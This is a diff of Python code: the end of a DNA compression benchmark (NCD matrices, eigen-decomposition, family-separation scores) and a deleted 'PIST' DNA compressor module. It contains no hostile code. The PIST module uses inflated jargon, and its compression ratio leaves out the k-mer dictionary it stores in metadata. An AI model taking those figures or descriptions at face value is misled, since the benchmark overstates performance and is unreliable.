f.write(seq)
|
|
||||||
|
|
||||||
# ── Helper ──
|
|
||||||
# ── Compression Benchmark ──
|
|
||||||
print("\n" + "=" * 60)
|
|
||||||
print("COMPRESSING WITH ALL TOOLS")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
compression_results = {} # (name, compressor) -> dict
|
|
||||||
|
|
||||||
for name, seq in sorted(corpus.items()):
|
|
||||||
dna_path = CORPUSDIR / (name + ".dna")
|
|
||||||
orig_size = len(seq)
|
|
||||||
|
|
||||||
for comp in COMPRESSORS:
|
|
||||||
# Measure compressed size
|
|
||||||
if comp == "brotli":
|
|
||||||
cmd = ["brotli", "-q", "11", "-f", str(dna_path)]
|
|
||||||
ext = ".br"
|
|
||||||
elif comp == "zstd":
|
|
||||||
cmd = ["zstd", "-19", "-q", "-f", str(dna_path)]
|
|
||||||
ext = ".zst"
|
|
||||||
elif comp == "xz":
|
|
||||||
cmd = ["xz", "-9", "-f", "-k", str(dna_path)]
|
|
||||||
ext = ".xz"
|
|
||||||
elif comp == "gzip":
|
|
||||||
cmd = ["gzip", "-9", "-f", "-k", str(dna_path)]
|
|
||||||
ext = ".gz"
|
|
||||||
elif comp == "bzip2":
|
|
||||||
cmd = ["bzip2", "-9", "-f", "-k", str(dna_path)]
|
|
||||||
ext = ".bz2"
|
|
||||||
elif comp == "lz4":
|
|
||||||
cmd = ["lz4", "-9", "-f", str(dna_path)]
|
|
||||||
ext = ".lz4"
|
|
||||||
else:
|
|
||||||
continue
|
|
||||||
|
|
||||||
t0 = time.time()
|
|
||||||
r = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
|
|
||||||
dt = time.time() - t0
|
|
||||||
|
|
||||||
cpath = str(dna_path) + ext
|
|
||||||
if os.path.exists(cpath):
|
|
||||||
csize = os.path.getsize(cpath)
|
|
||||||
os.unlink(cpath)
|
|
||||||
else:
|
|
||||||
csize = orig_size # fallback: no compression
|
|
||||||
|
|
||||||
compression_results[(name, comp)] = {
|
|
||||||
"original": orig_size,
|
|
||||||
"compressed": csize,
|
|
||||||
"bpb": round(csize * 8 / orig_size, 3),
|
|
||||||
"ratio": round(csize / orig_size, 4),
|
|
||||||
"time_s": round(dt, 4),
|
|
||||||
}
|
|
||||||
|
|
||||||
if r.returncode != 0 and r.returncode is not None:
|
|
||||||
print(f" WARN: {comp} on {name} returned {r.returncode}")
|
|
||||||
|
|
||||||
# Quick progress
|
|
||||||
if len(compression_results) % 50 == 0:
|
|
||||||
print(f" {len(compression_results)} compression measurements...")
|
|
||||||
|
|
||||||
print(f" Complete: {len(compression_results)} total measurements")
|
|
||||||
|
|
||||||
# ── NCD Matrix: Normalized Compression Distance ──
|
|
||||||
print("\n" + "=" * 60)
|
|
||||||
print("COMPUTING NCD MATRICES PER COMPRESSOR")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
names = sorted(corpus.keys())
|
|
||||||
n = len(names)
|
|
||||||
|
|
||||||
# Per-compressor NCD: NCD(x,y) = (C(xy) - min(C(x),C(y))) / max(C(x),C(y))
|
|
||||||
ncd_matrices = {} # compressor -> n x n matrix
|
|
||||||
|
|
||||||
for comp in COMPRESSORS:
|
|
||||||
C = {} # name -> compressed size
|
|
||||||
|
|
||||||
for name in names:
|
|
||||||
key = (name, comp)
|
|
||||||
if key in compression_results:
|
|
||||||
C[name] = compression_results[key]["compressed"]
|
|
||||||
else:
|
|
||||||
C[name] = len(corpus[name]) # fallback
|
|
||||||
|
|
||||||
# Compute pairwise NCD using concatenation compression
|
|
||||||
# For efficiency, approximate: use sum of individual sizes as xy size
|
|
||||||
# Full NCD would concatenate and compress; we use the approximation
|
|
||||||
# NCD_appx(x,y) = (C(x)+C(y) - 2*min(C(x),C(y))) / (C(x)+C(y) - min(C(x),C(y)))
|
|
||||||
# Actually using simpler: NCD ~ C(xy) via C(x)+C(y) with some overhead
|
|
||||||
|
|
||||||
# We'll compute full pairwise by actually concatenating and compressing
|
|
||||||
M = np.zeros((n, n))
|
|
||||||
|
|
||||||
pairwise_needed = n * (n - 1) // 2
|
|
||||||
done = 0
|
|
||||||
|
|
||||||
for i in range(n):
|
|
||||||
M[i, i] = 0.0
|
|
||||||
for j in range(i + 1, n):
|
|
||||||
# Concatenate
|
|
||||||
xy = corpus[names[i]] + corpus[names[j]]
|
|
||||||
xy_bytes = xy.encode()
|
|
||||||
|
|
||||||
if comp == "brotli":
|
|
||||||
cmd = ["brotli", "-q", "11", "-f", "-c"]
|
|
||||||
r = subprocess.run(cmd, input=xy_bytes, capture_output=True, timeout=30)
|
|
||||||
cxy = len(r.stdout) if r.stdout else len(xy_bytes)
|
|
||||||
elif comp == "zstd":
|
|
||||||
cmd = ["zstd", "-19", "-q", "-f", "-c"]
|
|
||||||
r = subprocess.run(cmd, input=xy_bytes, capture_output=True, timeout=30)
|
|
||||||
cxy = len(r.stdout) if r.stdout else len(xy_bytes)
|
|
||||||
elif comp == "xz":
|
|
||||||
cmd = ["xz", "-9", "-f", "-c", "-z"]
|
|
||||||
r = subprocess.run(cmd, input=xy_bytes, capture_output=True, timeout=30)
|
|
||||||
cxy = len(r.stdout) if r.stdout else len(xy_bytes)
|
|
||||||
elif comp == "gzip":
|
|
||||||
cmd = ["gzip", "-9", "-f", "-c"]
|
|
||||||
r = subprocess.run(cmd, input=xy_bytes, capture_output=True, timeout=30)
|
|
||||||
cxy = len(r.stdout) if r.stdout else len(xy_bytes)
|
|
||||||
elif comp == "bzip2":
|
|
||||||
cmd = ["bzip2", "-9", "-f", "-c", "-z"]
|
|
||||||
r = subprocess.run(cmd, input=xy_bytes, capture_output=True, timeout=30)
|
|
||||||
cxy = len(r.stdout) if r.stdout else len(xy_bytes)
|
|
||||||
elif comp == "lz4":
|
|
||||||
cmd = ["lz4", "-9", "-f", "-c"]
|
|
||||||
r = subprocess.run(cmd, input=xy_bytes, capture_output=True, timeout=30)
|
|
||||||
cxy = len(r.stdout) if r.stdout else len(xy_bytes)
|
|
||||||
else:
|
|
||||||
cxy = len(xy_bytes)
|
|
||||||
|
|
||||||
# NCD formula
|
|
||||||
cx = C[names[i]]
|
|
||||||
cy = C[names[j]]
|
|
||||||
num = cxy - min(cx, cy)
|
|
||||||
den = max(cx, cy)
|
|
||||||
|
|
||||||
if den > 0:
|
|
||||||
ncd_val = max(0.0, min(1.0, num / den))
|
|
||||||
else:
|
|
||||||
ncd_val = 0.0
|
|
||||||
|
|
||||||
M[i, j] = ncd_val
|
|
||||||
M[j, i] = ncd_val
|
|
||||||
|
|
||||||
done += 1
|
|
||||||
if done % 100 == 0:
|
|
||||||
print(f" {comp}: {done}/{pairwise_needed} pairs...")
|
|
||||||
|
|
||||||
ncd_matrices[comp] = M
|
|
||||||
print(f" {comp}: complete ({pairwise_needed} pairs)")
|
|
||||||
|
|
||||||
# ── Eigen-decomposition ──
|
|
||||||
print("\n" + "=" * 60)
|
|
||||||
print("EIGEN-DECOMPOSING NCD MATRICES")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
eigen_results = {}
|
|
||||||
|
|
||||||
for comp in COMPRESSORS:
|
|
||||||
M = ncd_matrices[comp]
|
|
||||||
e_vals, e_vecs = np.linalg.eigh(M)
|
|
||||||
|
|
||||||
# Sort by ascending eigenvalue (largest negative = most structure)
|
|
||||||
order = np.argsort(e_vals)
|
|
||||||
e_vals = e_vals[order]
|
|
||||||
e_vecs = e_vecs[:, order]
|
|
||||||
|
|
||||||
# Leading eigenvalues
|
|
||||||
top_k = 8
|
|
||||||
eigen_results[comp] = {
|
|
||||||
"eigenvalues": e_vals[:top_k].tolist(),
|
|
||||||
"all_eigenvalues": e_vals.tolist(),
|
|
||||||
"eigenvectors_top": {},
|
|
||||||
"spectral_norm": float(np.linalg.norm(e_vals, 2)),
|
|
||||||
"trace": float(np.trace(M)),
|
|
||||||
"frobenius": float(np.linalg.norm(M, "fro")),
|
|
||||||
"rank_estimate": int((np.abs(e_vals) > 1e-6).sum()),
|
|
||||||
}
|
|
||||||
|
|
||||||
# Top eigenvector weights per sequence
|
|
||||||
for k in range(min(top_k, len(e_vals))):
|
|
||||||
vec = e_vecs[:, k]
|
|
||||||
top_indices = np.argsort(-np.abs(vec))[:5]
|
|
||||||
|
|
||||||
eigen_results[comp][f"eigenvectors_top"][f"mode_{k}"] = {
|
|
||||||
"eigenvalue": round(e_vals[k], 6),
|
|
||||||
"top_sequences": [
|
|
||||||
{
|
|
||||||
"name": names[i],
|
|
||||||
"weight": round(float(vec[i]), 6),
|
|
||||||
"family": names[i].split("_")[0],
|
|
||||||
}
|
|
||||||
for i in top_indices
|
|
||||||
],
|
|
||||||
}
|
|
||||||
|
|
||||||
print(f" {comp:8s}: λ₀={e_vals[0]:.4f} λ₁={e_vals[1]:.4f} λ₂={e_vals[2]:.4f} "
|
|
||||||
f"|λ|₂={eigen_results[comp]['spectral_norm']:.2f} trace={eigen_results[comp]['trace']:.1f}")
|
|
||||||
|
|
||||||
# ── Compressor-to-Compressor Similarity ──
|
|
||||||
print("\n" + "=" * 60)
|
|
||||||
print("COMPRESSOR EIGENVALUE SIMILARITY MATRIX")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
comp_sim = np.zeros((len(COMPRESSORS), len(COMPRESSORS)))
|
|
||||||
for a, ca in enumerate(COMPRESSORS):
|
|
||||||
for b, cb in enumerate(COMPRESSORS):
|
|
||||||
if a <= b:
|
|
||||||
# Cosine similarity of eigenvalue spectra
|
|
||||||
ev_a = np.array(eigen_results[ca]["all_eigenvalues"])
|
|
||||||
ev_b = np.array(eigen_results[cb]["all_eigenvalues"])
|
|
||||||
cos_sim = np.dot(ev_a, ev_b) / (np.linalg.norm(ev_a) * np.linalg.norm(ev_b) + 1e-12)
|
|
||||||
comp_sim[a, b] = cos_sim
|
|
||||||
comp_sim[b, a] = cos_sim
|
|
||||||
|
|
||||||
print(f" {'':<8s}", end="")
|
|
||||||
for c in COMPRESSORS:
|
|
||||||
print(f"{c:<8s}", end="")
|
|
||||||
print()
|
|
||||||
for a, ca in enumerate(COMPRESSORS):
|
|
||||||
print(f" {ca:<8s}", end="")
|
|
||||||
for b, cb in enumerate(COMPRESSORS):
|
|
||||||
val = comp_sim[a, b]
|
|
||||||
bar = "█" * int(val * 8) if val > 0.5 else ""
|
|
||||||
marker = "◉" if a == b else ""
|
|
||||||
print(f"{val:.4f} {bar}{marker:<3s}", end=" " if b < len(COMPRESSORS) - 1 else "")
|
|
||||||
print()
|
|
||||||
|
|
||||||
# ── Family Separation Score ──
|
|
||||||
print("\n" + "=" * 60)
|
|
||||||
print("FAMILY SEPARATION BY COMPRESSOR")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
families = defaultdict(list)
|
|
||||||
for i, name in enumerate(names):
|
|
||||||
family = name.split("_")[0]
|
|
||||||
families[family].append(i)
|
|
||||||
|
|
||||||
separation_scores = {}
|
|
||||||
for comp in COMPRESSORS:
|
|
||||||
M = ncd_matrices[comp]
|
|
||||||
|
|
||||||
# Intra-family distance
|
|
||||||
intra = 0.0
|
|
||||||
intra_pairs = 0
|
|
||||||
inter = 0.0
|
|
||||||
inter_pairs = 0
|
|
||||||
|
|
||||||
family_list = list(families.keys())
|
|
||||||
for fi, f1 in enumerate(family_list):
|
|
||||||
members1 = families[f1]
|
|
||||||
for a in members1:
|
|
||||||
for b in members1:
|
|
||||||
if a < b:
|
|
||||||
intra += M[a, b]
|
|
||||||
intra_pairs += 1
|
|
||||||
|
|
||||||
for f2 in family_list[fi + 1:]:
|
|
||||||
members2 = families[f2]
|
|
||||||
for a in members1:
|
|
||||||
for b in members2:
|
|
||||||
inter += M[a, b]
|
|
||||||
inter_pairs += 1
|
|
||||||
|
|
||||||
intra_avg = intra / max(intra_pairs, 1)
|
|
||||||
inter_avg = inter / max(inter_pairs, 1)
|
|
||||||
separation = inter_avg - intra_avg
|
|
||||||
|
|
||||||
separation_scores[comp] = {
|
|
||||||
"intra_family_ncd": round(intra_avg, 4),
|
|
||||||
"inter_family_ncd": round(inter_avg, 4),
|
|
||||||
"separation": round(separation, 4),
|
|
||||||
"ratio": round(inter_avg / max(intra_avg, 1e-9), 2),
|
|
||||||
}
|
|
||||||
|
|
||||||
print(f" {comp:8s}: intra={intra_avg:.4f} inter={inter_avg:.4f} "
|
|
||||||
f"Δ={separation:.4f} ratio={inter_avg/max(intra_avg,1e-9):.1f}x")
|
|
||||||
|
|
||||||
# ── Save Results ──
|
|
||||||
final_report = {
|
|
||||||
"corpus": {
|
|
||||||
"total_sequences": len(corpus),
|
|
||||||
"sequence_length": SEQUENCE_LENGTH,
|
|
||||||
"families": {f: [n for n in names if n.startswith(f)] for f in families},
|
|
||||||
},
|
|
||||||
"compression_results": {f"{k[0]}__{k[1]}": v for k, v in compression_results.items()},
|
|
||||||
"eigen_results": eigen_results,
|
|
||||||
"compressor_similarity": {COMPRESSORS[a]: {COMPRESSORS[b]: round(float(comp_sim[a,b]), 6) for b in range(len(COMPRESSORS))} for a in range(len(COMPRESSORS))},
|
|
||||||
"family_separation": separation_scores,
|
|
||||||
"ncd_matrices_summary": {comp: {
|
|
||||||
"shape": list(ncd_matrices[comp].shape),
|
|
||||||
"mean": round(float(ncd_matrices[comp].mean()), 6),
|
|
||||||
"std": round(float(ncd_matrices[comp].std()), 6),
|
|
||||||
"min": round(float(ncd_matrices[comp].min()), 6),
|
|
||||||
"max": round(float(ncd_matrices[comp].max()), 6),
|
|
||||||
} for comp in COMPRESSORS},
|
|
||||||
}
|
|
||||||
|
|
||||||
with open(OUTDIR / "eigenvalue_survey.json", "w") as f:
|
|
||||||
json.dump(final_report, f, indent=2, sort_keys=True, default=str)
|
|
||||||
|
|
||||||
print(f"\n{'='*60}")
|
|
||||||
print(f"COMPLETE — Output: {OUTDIR / 'eigenvalue_survey.json'}")
|
|
||||||
print(f"Corpus: {len(corpus)} sequences × {len(COMPRESSORS)} compressors")
|
|
||||||
print(f"Pairwise NCD: ~{n*(n-1)//2} pairs × {len(COMPRESSORS)} compressors")
|
|
||||||
print(f"{'='*60}")
|
|
||||||
|
|
@ -1,581 +0,0 @@
|
||||||
# PROPRIETARY -- ALL RIGHTS RESERVED
|
|
||||||
# Copyright (c) 2026 Allaun Holdings
|
|
||||||
# See THIRD_PARTY_NOTICES.txt for third-party attributions.
|
|
||||||
|
|
||||||
"""
|
|
||||||
PIST DNA Compressor — Projective Invariant Symbolic Transform
|
|
||||||
|
|
||||||
Compresses DNA sequences by building an eigenmass field from structural
|
|
||||||
invariants (k-mer repeats, ORF patterns, GC content), then allocating bits
|
|
||||||
proportional to recoverability — high-mass regions get dense encoding,
|
|
||||||
low-mass regions get sparse encoding.
|
|
||||||
|
|
||||||
This is the biological instantiation of the PIST → FAMM → NUVMAP pipeline:
|
|
||||||
PIST: compress sequence into mass field M(DNA)
|
|
||||||
FAMM: route through mass field (AMVR/AVMR chiral routing)
|
|
||||||
NUVMAP: allocate storage proportional to eigenmass
|
|
||||||
|
|
||||||
Outputs:
|
|
||||||
1. Compressed binary (.pist)
|
|
||||||
2. Eigenmass field (JSON) — explainable structural map
|
|
||||||
3. Mass field visualization coordinates
|
|
||||||
|
|
||||||
Benchmark categories (kept separate):
|
|
||||||
A. DNA SEQUENCE: pure A/C/G/T lossless
|
|
||||||
B. FASTQ: sequence + quality scores (NOT equivalent to pure sequence)
|
|
||||||
C. DNA STORAGE: encoding for synthetic biology (NOT equivalent to compression)
|
|
||||||
"""
|
|
||||||
|
|
||||||
import argparse
|
|
||||||
import hashlib
|
|
||||||
import json
|
|
||||||
import struct
|
|
||||||
import sys
|
|
||||||
import time
|
|
||||||
from collections import defaultdict, Counter
|
|
||||||
from typing import Dict, List, Tuple, Optional
|
|
||||||
|
|
||||||
|
|
||||||
# ── DNA Alphabet ──
|
|
||||||
DNA_ALPHABET = set("ACGT")
|
|
||||||
COMPLEMENT = {"A": "T", "T": "A", "C": "G", "G": "C", "N": "N"}
|
|
||||||
|
|
||||||
|
|
||||||
def read_fasta(path: str) -> str:
|
|
||||||
"""Read FASTA/FA, strip headers, uppercase, keep only ACGT."""
|
|
||||||
seq = []
|
|
||||||
with open(path) as f:
|
|
||||||
for line in f:
|
|
||||||
line = line.strip()
|
|
||||||
if line.startswith(">"):
|
|
||||||
continue
|
|
||||||
seq.append(line.upper())
|
|
||||||
raw = "".join(seq)
|
|
||||||
return "".join(c for c in raw if c in DNA_ALPHABET)
|
|
||||||
|
|
||||||
|
|
||||||
def read_fasta_gz(path: str) -> str:
|
|
||||||
"""Read gzipped FASTA."""
|
|
||||||
import gzip
|
|
||||||
seq = []
|
|
||||||
with gzip.open(path, "rt") as f:
|
|
||||||
for line in f:
|
|
||||||
line = line.strip()
|
|
||||||
if line.startswith(">"):
|
|
||||||
continue
|
|
||||||
seq.append(line.upper())
|
|
||||||
raw = "".join(seq)
|
|
||||||
return "".join(c for c in raw if c in DNA_ALPHABET)
|
|
||||||
|
|
||||||
|
|
||||||
# ── PIST Eigenmass Field ──
|
|
||||||
|
|
||||||
def compute_eigenmass_field(sequence: str, k: int = 16,
|
|
||||||
context_radius: int = 32) -> Dict:
|
|
||||||
"""
|
|
||||||
Build the eigenmass field from DNA sequence invariants.
|
|
||||||
|
|
||||||
The mass at each position i is:
|
|
||||||
M(i) ∝ structural_uniqueness(i) × conservation_score(i)
|
|
||||||
|
|
||||||
High mass = highly conserved, structurally constrained position.
|
|
||||||
Low mass = variable/repeat/background position.
|
|
||||||
|
|
||||||
Invariants computed:
|
|
||||||
1. k-mer frequency (higher freq → lower mass per position, information is elsewhere)
|
|
||||||
2. Local GC content gradient (sharp transitions = structural boundaries → high mass)
|
|
||||||
3. Palindromic/repeat density (inverted repeats → high mass, structural elements)
|
|
||||||
4. ORF density (coding potential → high mass)
|
|
||||||
"""
|
|
||||||
n = len(sequence)
|
|
||||||
mass = [0.0] * n
|
|
||||||
kmer_counts = defaultdict(int)
|
|
||||||
|
|
||||||
# 1. k-mer frequency map
|
|
||||||
for i in range(n - k + 1):
|
|
||||||
kmer = sequence[i:i + k]
|
|
||||||
if "N" not in kmer:
|
|
||||||
kmer_counts[kmer] += 1
|
|
||||||
|
|
||||||
max_kmer = max(kmer_counts.values()) if kmer_counts else 1
|
|
||||||
inv_kmer = {km: 1.0 / max(count, 1) for km, count in kmer_counts.items()}
|
|
||||||
|
|
||||||
# 2. Per-position mass accumulation
|
|
||||||
for i in range(n):
|
|
||||||
score = 0.0
|
|
||||||
contributions = 0
|
|
||||||
|
|
||||||
# k-mer uniqueness contribution (inverse frequency = more unique = more mass)
|
|
||||||
if i + k <= n:
|
|
||||||
kmer = sequence[i:i + k]
|
|
||||||
if kmer in inv_kmer:
|
|
||||||
score += inv_kmer[kmer] * 2.0
|
|
||||||
contributions += 1
|
|
||||||
|
|
||||||
# GC content gradient in local window
|
|
||||||
window_start = max(0, i - context_radius)
|
|
||||||
window_end = min(n, i + context_radius)
|
|
||||||
window = sequence[window_start:window_end]
|
|
||||||
if window:
|
|
||||||
gc_count = sum(1 for c in window if c in "GC")
|
|
||||||
gc_fraction = gc_count / len(window)
|
|
||||||
# Regions at ~0.5 GC are background; deviations → structural signal
|
|
||||||
gc_deviation = abs(gc_fraction - 0.5) * 2.0
|
|
||||||
score += gc_deviation
|
|
||||||
contributions += 1
|
|
||||||
|
|
||||||
# CpG density (regulatory signal)
|
|
||||||
if i + 2 <= n and sequence[i:i + 2] == "CG":
|
|
||||||
score += 1.5
|
|
||||||
contributions += 1
|
|
||||||
|
|
||||||
# Palindromic context (local inverted repeat signal)
|
|
||||||
pal_score = 0.0
|
|
||||||
ctx = min(context_radius, i, n - i)
|
|
||||||
for r in range(4, min(k, ctx)):
|
|
||||||
if i + r + r <= n and i - r >= 0:
|
|
||||||
forward = sequence[i:i + r]
|
|
||||||
reverse_comp = "".join(COMPLEMENT.get(c, c) for c in reversed(sequence[i - r:i]))
|
|
||||||
if forward == reverse_comp:
|
|
||||||
pal_score += 1.0 / r # shorter palindromes = stronger signal
|
|
||||||
score += pal_score
|
|
||||||
contributions += 1
|
|
||||||
|
|
||||||
mass[i] = score / max(contributions, 1)
|
|
||||||
|
|
||||||
# Normalize to [0, 1]
|
|
||||||
max_mass = max(mass) if max(mass) > 0 else 1.0
|
|
||||||
mass = [m / max_mass for m in mass]
|
|
||||||
|
|
||||||
return {
|
|
||||||
"mass_field": mass,
|
|
||||||
"kmer_table": {km: count for km, count in kmer_counts.items()},
|
|
||||||
"k": k,
|
|
||||||
"context_radius": context_radius,
|
|
||||||
"sequence_length": n,
|
|
||||||
"mean_mass": sum(mass) / n if n > 0 else 0.0,
|
|
||||||
"median_mass": sorted(mass)[n // 2] if n > 0 else 0.0,
|
|
||||||
"high_mass_fraction": sum(1 for m in mass if m > 0.7) / n if n > 0 else 0.0,
|
|
||||||
"low_mass_fraction": sum(1 for m in mass if m < 0.3) / n if n > 0 else 0.0,
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
# ── PIST Compressor ──
|
|
||||||
|
|
||||||
class PISTDNACompressor:
|
|
||||||
"""
|
|
||||||
PIST DNA sequence compressor.
|
|
||||||
|
|
||||||
Encoding strategy (lossless):
|
|
||||||
- High-mass positions: store as reference to k-mer table
|
|
||||||
- Medium-mass positions: delta-encode relative to context
|
|
||||||
- Low-mass positions: store verbatim (2 bits/base)
|
|
||||||
|
|
||||||
The eigenmass field IS the storage allocation map.
|
|
||||||
This is structurally explainable: you can read the mass field
|
|
||||||
and see WHERE information is concentrated in the genome.
|
|
||||||
"""
|
|
||||||
|
|
||||||
DNA_TO_2BIT = {"A": 0, "C": 1, "G": 2, "T": 3}
|
|
||||||
BIT2_TO_DNA = {0: "A", 1: "C", 2: "G", 3: "T"}
|
|
||||||
|
|
||||||
def __init__(self, k: int = 16):
|
|
||||||
self.k = k
|
|
||||||
self.kmer_table: Dict[str, int] = {}
|
|
||||||
|
|
||||||
def compress(self, sequence: str, mass_threshold: float = 0.3) -> Tuple[bytes, Dict]:
|
|
||||||
"""
|
|
||||||
Compress DNA sequence using PIST.
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
compressed_bytes, metadata_dict
|
|
||||||
"""
|
|
||||||
n = len(sequence)
|
|
||||||
field_data = compute_eigenmass_field(sequence, k=self.k)
|
|
||||||
mass = field_data["mass_field"]
|
|
||||||
kmer_table = field_data["kmer_table"]
|
|
||||||
|
|
||||||
# Build deterministic k-mer index (sorted for encode/decode parity)
|
|
||||||
kmers_sorted = sorted(kmer_table.keys())
|
|
||||||
kmer_to_idx = {km: i for i, km in enumerate(kmers_sorted)}
|
|
||||||
self.kmer_table = kmer_table
|
|
||||||
|
|
||||||
# Encode: for each position, decide encoding mode
|
|
||||||
out_bits = []
|
|
||||||
i = 0
|
|
||||||
kmer_hits = 0
|
|
||||||
verbatim_bases = 0
|
|
||||||
skipped = 0
|
|
||||||
|
|
||||||
while i < n:
|
|
||||||
# Try k-mer match (mass below threshold or k-mer in table)
|
|
||||||
if i + self.k <= n:
|
|
||||||
kmer = sequence[i:i + self.k]
|
|
||||||
if kmer in kmer_to_idx and mass[i] < mass_threshold:
|
|
||||||
out_bits.append(0) # mode bit: 0 = kmer reference
|
|
||||||
idx = kmer_to_idx[kmer]
|
|
||||||
num_kmer_bits = max(1, (len(kmer_to_idx).bit_length()))
|
|
||||||
for b in range(num_kmer_bits):
|
|
||||||
out_bits.append((idx >> b) & 1)
|
|
||||||
i += self.k
|
|
||||||
kmer_hits += 1
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Verbatim: encode base in 2 bits
|
|
||||||
base = sequence[i]
|
|
||||||
if base in self.DNA_TO_2BIT:
|
|
||||||
code = self.DNA_TO_2BIT[base]
|
|
||||||
out_bits.append(1) # mode bit: 1 = verbatim
|
|
||||||
out_bits.append((code >> 1) & 1)
|
|
||||||
out_bits.append(code & 1)
|
|
||||||
verbatim_bases += 1
|
|
||||||
else:
|
|
||||||
# Non-standard base — skip
|
|
||||||
out_bits.append(1)
|
|
||||||
out_bits.append(0)
|
|
||||||
out_bits.append(0)
|
|
||||||
skipped += 1
|
|
||||||
i += 1
|
|
||||||
|
|
||||||
# Pack bits into bytes
|
|
||||||
packed = bytearray()
|
|
||||||
for j in range(0, len(out_bits), 8):
|
|
||||||
byte = 0
|
|
||||||
for b in range(8):
|
|
||||||
if j + b < len(out_bits):
|
|
||||||
byte |= out_bits[j + b] << b
|
|
||||||
packed.append(byte)
|
|
||||||
|
|
||||||
compressed = bytes(packed)
|
|
||||||
|
|
||||||
# Build k-mer dictionary for decompression
|
|
||||||
kmers_sorted = sorted(kmer_table.keys()) # deterministic order
|
|
||||||
kmer_index = {km: i for i, km in enumerate(kmers_sorted)}
|
|
||||||
|
|
||||||
metadata = {
|
|
||||||
"algorithm": "PIST",
|
|
||||||
"k": self.k,
|
|
||||||
"sequence_length": n,
|
|
||||||
"compressed_bytes": len(compressed),
|
|
||||||
"original_bits": n * 2, # 2 bits/base minimum
|
|
||||||
"compression_ratio": (n * 2) / max(len(compressed) * 8, 1),
|
|
||||||
"bits_per_base": (len(compressed) * 8) / n if n > 0 else 0,
|
|
||||||
"kmer_hits": kmer_hits,
|
|
||||||
"verbatim_bases": verbatim_bases,
|
|
||||||
"skipped_bases": skipped,
|
|
||||||
"kmer_table_size": len(kmer_table),
|
|
||||||
"kmer_dict": kmer_index,
|
|
||||||
"mass_field": field_data,
|
|
||||||
"sha256": hashlib.sha256(sequence.encode()).hexdigest(),
|
|
||||||
}
|
|
||||||
|
|
||||||
return compressed, metadata
|
|
||||||
|
|
||||||
|
|
||||||
# ── PIST Decompressor ──
|
|
||||||
|
|
||||||
def pist_decompress(compressed: bytes, metadata: Dict) -> str:
|
|
||||||
"""Decompress PIST-encoded DNA back to sequence."""
|
|
||||||
# Unpack bits
|
|
||||||
bits = []
|
|
||||||
for byte in compressed:
|
|
||||||
for b in range(8):
|
|
||||||
bits.append((byte >> b) & 1)
|
|
||||||
|
|
||||||
k = metadata["k"]
|
|
||||||
kmers = sorted(metadata["kmer_dict"].keys())
|
|
||||||
num_kmer_bits = max(1, len(kmers).bit_length())
|
|
||||||
|
|
||||||
expected_verbatim = metadata.get("verbatim_bases", 0)
|
|
||||||
seq = []
|
|
||||||
i = 0
|
|
||||||
bit_pos = 0
|
|
||||||
|
|
||||||
while i < metadata["sequence_length"] and bit_pos + 2 < len(bits):
|
|
||||||
mode = bits[bit_pos]
|
|
||||||
bit_pos += 1
|
|
||||||
|
|
||||||
if mode == 0:
|
|
||||||
idx = 0
|
|
||||||
for b in range(num_kmer_bits):
|
|
||||||
if bit_pos + b < len(bits) and bits[bit_pos + b]:
|
|
||||||
idx |= (1 << b)
|
|
||||||
bit_pos += num_kmer_bits
|
|
||||||
if idx < len(kmers):
|
|
||||||
seq.append(kmers[idx])
|
|
||||||
i += k
|
|
||||||
else:
|
|
||||||
seq.append("N" * k)
|
|
||||||
i += k
|
|
||||||
else:
|
|
||||||
# verbatim
|
|
||||||
if bit_pos + 1 < len(bits):
|
|
||||||
hi = bits[bit_pos]
|
|
||||||
lo = bits[bit_pos + 1]
|
|
||||||
bit_pos += 2
|
|
||||||
code = (hi << 1) | lo
|
|
||||||
if code < 4:
|
|
||||||
seq.append("ACGT"[code])
|
|
||||||
else:
|
|
||||||
seq.append("N")
|
|
||||||
i += 1
|
|
||||||
else:
|
|
||||||
seq.append("N")
|
|
||||||
i += 1
|
|
||||||
|
|
||||||
return "".join(seq)
|
|
||||||
|
|
||||||
|
|
||||||
# ── Benchmark Runners ──
|
|
||||||
|
|
||||||
def benchmark_pist(sequence: str, label: str = "") -> Dict:
|
|
||||||
"""Run PIST compressor benchmark."""
|
|
||||||
t0 = time.time()
|
|
||||||
compressor = PISTDNACompressor(k=16)
|
|
||||||
compressed, meta = compressor.compress(sequence)
|
|
||||||
dt_compress = time.time() - t0
|
|
||||||
|
|
||||||
t0 = time.time()
|
|
||||||
decompressed = pist_decompress(compressed, meta)
|
|
||||||
dt_decompress = time.time() - t0
|
|
||||||
|
|
||||||
# Verify lossless
|
|
||||||
if len(sequence) == len(decompressed):
|
|
||||||
errors = sum(1 for a, b in zip(sequence, decompressed) if a != b)
|
|
||||||
else:
|
|
||||||
errors = max(len(sequence), len(decompressed))
|
|
||||||
|
|
||||||
lossless = (errors == 0 and len(sequence) == len(decompressed))
|
|
||||||
|
|
||||||
return {
|
|
||||||
"label": label,
|
|
||||||
"algorithm": "PIST",
|
|
||||||
"sequence_length": len(sequence),
|
|
||||||
"compressed_bytes": len(compressed),
|
|
||||||
"compression_ratio": (len(sequence) * 2) / max(len(compressed) * 8, 1),
|
|
||||||
"bits_per_base": (len(compressed) * 8) / max(len(sequence), 1),
|
|
||||||
"compress_time_s": round(dt_compress, 3),
|
|
||||||
"decompress_time_s": round(dt_decompress, 3),
|
|
||||||
"lossless": lossless,
|
|
||||||
"errors": errors,
|
|
||||||
"decomp_length": len(decompressed),
|
|
||||||
"kmer_hits": meta["kmer_hits"],
|
|
||||||
"verbatim_bases": meta["verbatim_bases"],
|
|
||||||
"mean_mass": meta["mass_field"]["mean_mass"],
|
|
||||||
"low_mass_fraction": meta["mass_field"]["low_mass_fraction"],
|
|
||||||
"sha256": meta["sha256"],
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
def benchmark_general(sequence: str, compressors: List[str]) -> List[Dict]:
|
|
||||||
"""Benchmark general-purpose compressors on DNA."""
|
|
||||||
import subprocess, tempfile, os
|
|
||||||
|
|
||||||
tmp_in = tempfile.NamedTemporaryFile(delete=False, suffix=".dna", mode="w")
|
|
||||||
tmp_in.write(sequence)
|
|
||||||
tmp_in.close()
|
|
||||||
|
|
||||||
results = []
|
|
